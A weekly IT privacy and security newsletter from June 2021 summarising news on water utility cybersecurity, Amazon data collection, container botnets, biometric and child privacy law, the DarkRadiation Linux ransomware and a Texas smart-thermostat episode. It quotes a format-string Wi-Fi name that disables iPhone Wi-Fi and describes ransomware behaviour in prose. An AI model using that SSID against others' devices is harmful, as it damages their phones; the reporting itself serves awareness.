The Wild Swings in Temperature of the IT Privacy and Security Weekly Update for June 22nd. 2021

G’Day Daml’ers!

From splashing in cold waters to baking in hot homes we cover the whole temperature range.

After a good headcount of our critical infrastructure, we give you the lowdown on tracking, bots, faces, and fingerprints. We update you on compliance, regulations, and (sadly) taxes, before delivering really bad news for our RedHat Linux and Docker users.

Finally, we unbork your iPhone before revealing just why you might be reading this in a full sweat.

So pull on your swimming trunks, put on your gloves and let’s go have an adventure with this week’s IT Privacy and Security Update!

US: How Cyber Safe is Your Drinking Water Supply?

The Water Sector Coordinating Council surveyed roughly 600 employees of water and wastewater treatment facilities nationwide, and found 37.9 percent of utilities have identified all of their IT-networked assets, another 21.7 percent were still working toward that goal. “Identifying IT and OT assets is a critical first step in improving cybersecurity,” the report concluded. “An organization cannot protect what it cannot see.” And because its hard to see threats you’re not looking for … a full 67.9 percent of water systems reported no IT security incidents over the last 12 months.

While documenting each device that needs protection is a necessary first step, a number of recent cyberattacks on water treatment systems have been blamed on a failure to properly secure water treatment employee accounts that can be used for remote access.

In April, federal prosecutors unsealed an indictment against a 22-year-old from Kansas who’s accused of hacking into a public water system in 2019. The defendant, in that case, is a former employee of the water district he allegedly hacked.

In February, we learned that someone hacked into the water treatment plan in Oldsmar, Fla. and briefly increased the amount of sodium hydroxide (a.k.a. lye used to control acidity in the water) to 100 times the normal level. That incident stemmed from stolen or leaked employee credentials for TeamViewer, a popular program that lets users remotely control their computers. Previously, in January, a hacker tried to poison a water treatment plant that served parts of the San Francisco Bay Area. The hacker in that case also had the username and password for a former employee’s TeamViewer account.

What are US authorities doing? Water utilities serving a greater than 50,000 population) have to certify to the Environmental Protection Agency (EPA) that they are compliant with the Water Infrastructure Act of 2018 which asks for inventory assets and sets a minimum bar for cybersecurity.
The water act gives utilities serving between 3,300 and 50,000 residents until the end of this month to complete a cybersecurity risk and resiliency assessment. That includes a review of:
Pipes and constructed conveyances, Physical barriers, Source water, Water collection and intake, Pretreatment, treatment, storage, and distribution facilities and Electronic, computer, or other automated systems
In addition to assessing the physical parts of the system, the utility must also assess Any Monitoring practices – physical security, water quality. Financial infrastructure – accounting, billing, and ability to do payroll when facing a threat, including cyber-attack or destruction of the administration buildings housing these systems, Use, storage, or handling of various chemicals by the water system, operation and maintenance of the system

But here is the rub, the vast majority of the nation’s water utilities — tens of thousands of them — serve fewer than 3,300 residents, and those utilities currently do not have to report to the EPA about their cybersecurity practices (or the lack thereof). “A large number of utilities — probably close to 40,000 of them — are small enough that they haven’t been asked to do anything.”

So what’s the upshot for you? Enabling multi-factor authentication for remote access can prevent many of these attacks, but probably first, the accounts in use would have to stop being shared. If you know anyone who works at a water utility, have them read this or listen to the Podcast… We’ll get the message across and you will drink the cool water of success.

Global: All the Ways Amazon Tracks You

OK let’s start with Amazon’s privacy notice. At more than 4,400 words it’s hardly surprising that most people don’t read it, but it does clearly lay out what Amazon does with your data. Broadly, the information that Amazon collects about you comes from three sources. These are the data you give it when you use Amazon (and its other services, such as reading Kindle books), the data it can collect automatically (information about your phone and your location), and, finally, information it gets from third parties (credit checks to find out if your account is fraudulent, for example). The ultimate goal of all this data collection? To help sell you more things.

“Personal data about shopping is incredibly sensitive,” says Carissa Véliz, an associate professor at the University of Oxford’s Institute for Ethics. “It can tell you about a person’s health status, their political tendencies, their sexual practices, and much more. People buy all kinds of things on Amazon, from books and movies to health-related items. Add to that personal data from Alexa, and it gets even more concerning.”

Amazon also uses information, such as your location, to make sure the things you buy actually get delivered to you.

Amazon’s privacy policy says you might—depending on your settings and how much you’ve decided hand over—give it: your name; address and phone number; bank details; age; location; the names, emails, and addresses of people in your contacts; any photographs you’ve uploaded to your profile; playlists; watchlists; wishlists; voice recordings; Wi-Fi credentials; credit history information and, if you sell items on Amazon, tax and other business information.

The automatic information Amazon collects is where things get amped up a bit higher. This is all data about how and when you use Amazon products. Freelance journalist Riccardo Coluccini was sent a table with 12,048 rows detailing all the clicks he made on Amazon’s website. “The values concern the day and time when a specific page is visited, the IP address and the device used, the geolocation—if possible—based on the IP address, and the name of the telecommunication company that offers the internet service,” he wrote in 2018. Similarly, other data requests to Amazon show how Kindle logs the date, time spent reading, and how often you copy or highlight parts of books. Likewise, Ring doorbells log every record of motion they detect and each tap made within the Ring app.

Amazon’s privacy notice details that it may automatically collect your IP address; login details; the location of computer; errors your device logs when using its services; your app preferences; cookie details; identifiers linked to your phone or computer; and all the URLs that you click, including page interaction information “such as scrolling, clicks, and mouse-overs”.

The final type of information Amazon collects about you is that from third parties. This can include updated delivery addresses if a delivery company finds there’s a problem with the one you provided; account and purchase information from “merchants with which we operate co-branded businesses”; information about “interactions” with Amazon’s subsidiaries (there’s a lot of them and they have their own privacy policies); information about devices you’ve linked with Alexa; and credit history it gets as part of its efforts to detect fraud.

It’s impossible to stop Amazon from tracking you completely—if you’re going to shop with Amazon then Amazon will collect your data.

Alexa and Ring, have their own privacy hubs where you can delete recordings and manage privacy settings. But for the majority of Amazon information, you’ll need your main account. You can turn off Amazon showing your personalized ads based on what it infers about your interests and likes – although you will still see recommendations based on your previous purchases on Amazon (they can be tweaked, but not turned off, here). You should also consider turning off advertising cookies, which allow third parties to collect your information. Amazon’s list of third-party cookie partners includes more than 75 companies, ranging from Facebook to mobile gaming giant King.

So what’s the upshot for you? This is a frighteningly large dataset, by any standard, so if you ever get to the point where so much profiling information just leaves you feeling uncomfortable, you can perform the ultimate purge. Set up a new account with a different e-mail, and run a few transactions through it. Once you are satisfied that it works the way you want, delete your original account and start using the new one, every year or so you can revert from one account to the other. Yes, sorry, this truly is the only way to clear down the data.

Global: Half of all misconfigured containers hit by botnets within one hour.

New research indicates a rise in cyberattacks targeting container infrastructure and supply chains with:

  • Higher levels of sophistication in attacks: Attackers have amplified their use of evasion and obfuscation techniques in order to avoid detection. These include packing the payloads, running malware straight from memory, and using rootkits.
  • Botnets are swiftly finding and infecting new hosts as they become vulnerable: 50% of new misconfigured Docker APIs are attacked by botnets within 56 minutes of being set up.
  • Crypto-currency mining is still the most common objective: More than 90% of the malicious images execute resources hijacking.
  • Increased use of backdoors: 40% of attacks involved creating backdoors on the host; adversaries are dropping dedicated malware, creating new users with root privileges and creating SSH keys for remote access.
  • Volume of attacks continues to grow: Daily attacks grew 26% on average between the first half and second half of 2020.

So what’s the upshot for you? We expect this type of news from a container security firm, but the reminder of the constant probing for open, misconfigured public facing ports in cloud infrastructure is always worth highlighting.

EU: The European Union Wants a Ban on AI Facial Recognition

The EU’s data protection agencies on Monday called for an outright ban on using artificial intelligence to identify people in public places, pointing to the “extremely high” risks to privacy.

The commission’s plan includes special exceptions for allowing the use of mass facial recognition in cases such as searching for a missing child, averting a terror threat, or tracking down someone suspected of a serious crime.

Brussels hopes its first-ever legislative package on AI will help Europe catch up with the US and China in a sector that spans from voice recognition to insurance and law enforcement.

In a statement, the commission said it took note of the opinion but stood by a proposal “that provides sufficient protection and limits the use of those systems to the strict minimum necessary”.

The proposal is under negotiation at the European Parliament and among the 27 member states.

So what’s the upshot for you? The outcome could set a global standard for how tech is regulated.

US: Six Flags to Pay $36M Over Collection of Fingerprints

Theme park operator Six Flags has agreed to pay US$36 million to settle a class-action lawsuit over its acquisition of the fingerprint data of visitors to its theme parks.

The Illinois Supreme Court ruled in the case Rosenbach v. Six Flags that collecting biometric data at premises’ gates by scanning fingerprints of people who enter the company’s theme park violates Illinois Biometric Information Privacy Act (BIPA).

The case involved a mother, Stacy Rosenbach, who in 2016 sued Six Flags Entertainment Corp. after the Gurnee, Illinois, branch of the theme park scanned the fingerprint of her 14-year-old son Alex without obtaining written consent and without properly disclosing the company’s business practices as to how they would use the data.

After passing through lower courts, the case made it to the Illinois Supreme Court, where Six Flags filed a motion to dismiss the case, claiming that Rosenbach was not an “aggrieved party” according to the BIPA because she had not proven an actual injury under the law.

However, the court denied the motion, ruling that someone “need not allege some actual injury or adverse effect, beyond violation of his or her rights” to qualify as an “aggrieved” person under the law, according to its decision.

So what’s the upshot for you? Passed in 2008, the BIPA regulates how companies collect and use someone’s biometric data, such as a retina or iris scan, fingerprint, voiceprint, or scan of hand or face geometry. The law mandates that a company must obtain a person’s written consent before acquiring and storing this type of data.

US: A Fifth of Google Play Apps Violate Child Protection Laws

One in five apps on Google Play designed for children appear to be breaking US federal law, according to new research from Comparitech.

The consumer rights and comparison site analyzed the top 300 free and top 200 paid apps on the marketplace under the children and family categories and reviewed each listed privacy policy.

It found that one in five contravened the Children’s Online Privacy Protection Act (COPPA), legislation which places a strict set of FTC-enforced requirements on websites and online services aimed specifically at the under-13s, or those that collect personal data on children.

Of the 20% of Google Play-listed apps found to be violating COPPA, half were collecting personal information from children without the required child-specific privacy policy in place.

9% tried to place responsibility on children and parents, either by asking kids not to submit their personal info to the app or parents to monitor their child’s app usage. Both violate COPPA.

“Furthermore, two hundred and seventy-four of the apps we reviewed also received the teacher-approved tick with 50 (18%) in violation of COPPA guidelines. This means the apps and their privacy policies have been through two layers of review and have still passed quality control despite being in breach of COPPA’s standards.”

Most of the offending info collected by the apps came in the form of IP addresses (42%), followed by online contact information (16%), name (12%), address (7%), telephone number (7%), and other details.

So what’s the upshot for you? In 2019 YouTube paid the Federal Trade Commission $170 million to settle a case under COPPA where they collected personal information from viewers of child-oriented channels without asking parents first. In this case, it is unclear who would be fined, Google or the app developers.

UK: Despite warnings, MI5 still risks breaking the law by continuing to hold outdated surveillance data.

MI5’s personal data storage from espionage subjects still faces “legal compliance risk” issues in spite of years of warnings from UK Government regulator.

The sustained legal issues even triggered a Parliamentary statement by Home Secretary Priti Patel, revealing that the domestic spy agency did not have “a culture of individual accountability for legal compliance risk” until external oversight forced change upon the agency.

The latest report, itself a report into an earlier review which made recommendations MI5 hasn’t fully complied with, stems back to failures first identified in the mid-2010s.

Reports over the years revealed an internal culture within MI5 that seemingly treated legal compliance as an unimportant formality. Related allegations of law-breaking are the subject of an ongoing legal case by the Privacy International campaign group.

Back in 2017, there was at least one complex error reported by MI5 in relation to the retention of data on an area within their IT systems. At the time, a statement said, “MI5 is undertaking work to remedy this problem and delete data which has been retained erroneously.”

It doesn’t look like that clean-up work was ever completed.

So what’s the upshot for you? Information can become a huge liability if it is held after it has served its useful purpose. It’s just a shame that the British government is so slow to learn this.

US: Hit by a ransomware attack? Your payment may be tax-Deductible

A report from The Associated Press over the weekend cited tax lawyers and accountants who claimed the little-known clause could be a “silver lining” for ransomware victims.

However, the deduction could also be seen as a further corporate incentive to pay up, encouraging more affiliate groups to join the race to pilfer money from big-name multinationals.

It also flies in the face of official US government guidance, repeated many times by FBI boss Christopher Wray and others, that organizations should not pay any ransom.

For now: “I would counsel a client to take a deduction for it,” says Scott Harty, a corporate tax attorney with Alston & Bird. “It fits the definition of an ordinary and necessary expense.”

So what’s the upshot for you? We don’t expect this tax break to last very long… Especially after this Associated Press report!

Global: Wormable DarkRadiation Ransomware Targets Linux and Docker Instances

“The ransomware is written in Bash script and targets Red Hat/CentOS and Debian Linux distributions,” researchers from Trend Micro said in a report published last week. “The malware uses OpenSSL’s AES algorithm with CBC mode to encrypt files in various directories. It also uses Telegram’s API to send an infection status to the threat actor(s).”

As of writing, there’s no information available on the delivery methods or evidence that the ransomware has been deployed in real-world attacks.

The findings come from an analysis of a collection of hacking tools hosted on the unidentified threat actor’s infrastructure (IP address “”) in a directory called “api_attack.” The toolset was first noticed by Twitter user @r3dbU7z on May 28.

DarkRadiation’s infection chain involves a multi-stage attack process and is noteworthy for its extensive reliance on Bash scripts to retrieve the malware and encrypt the files as well as Telegram API to communicate with the C2 server via hardcoded API keys.

Said to be under active development, the ransomware leverages obfuscation tactics to scramble the Bash script using an open-source tool called “node-bash-obfuscate” to split the code into multiple chunks, followed by assigning a variable name to each segment and replacing the original script with variable references.

Upon execution, DarkRadiation checks if it’s run as the root user, and if so, uses the elevated permissions to download and install Wget, cURL, and OpenSSL libraries, and takes a periodic snapshot of the users that are currently logged into a Unix computer system using the “who” command every five seconds, the results of which are then exfiltrated to an attacker-controlled server using the Telegram API.

“If any of these are not available on the infected device, the malware attempts to download the required tools using YUM (Yellowdog Updater, Modified), a python-based package manager widely adopted by popular Linux distros such as RedHat and CentOS,” SentinelOne researchers explained in a write-up published Monday.

The ransomware, in its final phase of the infection, retrieves a list of all available users on the compromised system, overwrites existing user passwords with “megapassword,” and deletes all shell users, but not before creating a new user with the username “ferrum” and password “MegPw0rD3” to proceed with the encryption process.
DarkRadiation also comes with capabilities to stop and disable all running Docker containers on the infected machine, after which a ransom note is displayed to the user.

“Malware written in shell script languages allows attackers to be more versatile and to avoid some common detection methods,” SentinelOne researchers said.

“As scripts do not need to be recompiled, they can be iterated upon more rapidly. Moreover, since some security software relies on static file signatures, these can easily be evaded through rapid iteration and the use of simple obfuscator tools to generate completely different script files.”

So what’s the upshot for you? Linux used to be the last bastion where Malware would not go. Not anymore, oh, and we’re seeing that the malware is still under development. It’s a sure bet that the hardcoded password specified has already been updated.

Global: This WiFi Name will bork your iPhone

A new iPhone bug has come to light that breaks your iPhone’s wireless functionality by merely connecting to a specific WiFi name.

Once triggered, the bug would render your iPhone unable to establish a WiFi connection, even if it is rebooted or the WiFi hotspot is renamed.

"After joining my personal WiFi with the SSID ‘%p%s%s%s%s%n’, my iPhone permanently disabled it’s WiFi functionality. Neither rebooting nor changing SSID fixes it "

So what’s the upshot for you? Although we expect an iOS update imminently, there is a fix without resetting your entire phone.
Follow these steps to reset your iOS network settings to resolve the issue:
1.) Go to Settings on your iPhone, select General.
2.) Under General select Reset.
You will now be at the Reset screen, where you can reset various features of iOS or the device itself.
3.) At this screen, select the ‘Reset Network Settings’ option and confirm you would like to continue when asked.
4.) The device will now restart and reset all of your network settings back to factory default. Once it has restarted, enter your passcode, and you can reconfigure your Wi-Fi settings again.

US: Smart thermostats cranked up remotely by Texas energy firms, as consumers swelter in heat wave

Some said they didn’t know their thermostats were being accessed from afar until it was almost 80 degrees inside their homes.

HOUSTON — Some neighbors in the Houston area said their homes have been much warmer this week, even while they are running their air conditioners.

Many of them claim someone has been turning up the temperature on their thermostats since the energy shortage began.

The Electric Reliability Council of Texas (ERCOT) has told residents to conserve as much energy as possible, asking them to set their thermostats to 78 degrees Fahrenheit (25.5 degrees Celsius) or higher during the peak hours of 3-7pm. But what are energy companies supposed to do if people really want their air conditioning to blast away the heat?

The answer, it appears, is to take remote control of users’ smart thermostats and bump up the temperature.

Apparently, the users are using smart thermostats that are taking part in a program called “Smart Savers Texas,” operated by a company called EnergyHub. As WFAA explains, signing up for “Smart Savers Texas” also signs away the rights for energy firms to seize remote control of the thermostats, turning it up and preventing it from being turned down again. The agreement states that in exchange for an entry into sweepstakes, electric customers allow them to control their thermostats during periods of high energy demand.

Clearly, some Texans weren’t aware of the implications of what they had signed up for, and had no knowledge that someone else was controlling their thermostat during the heat wave – leaving their families sweltering.

So what’s the upshot for you? Only now are some smart thermostat owners realizing that there are drawbacks to having a thermostat connected to the internet. Maybe this incident will act as a wake-up call to others – it’s probably better to learn this lesson when your energy supplier meddles with your thermostat than a malicious hacker.

And that’s it for this week. Take se7en days to cool down when we promise we will have another hot IT Privacy and Security Weekly update for you.

Be kind. Stay safe. Stay Secure.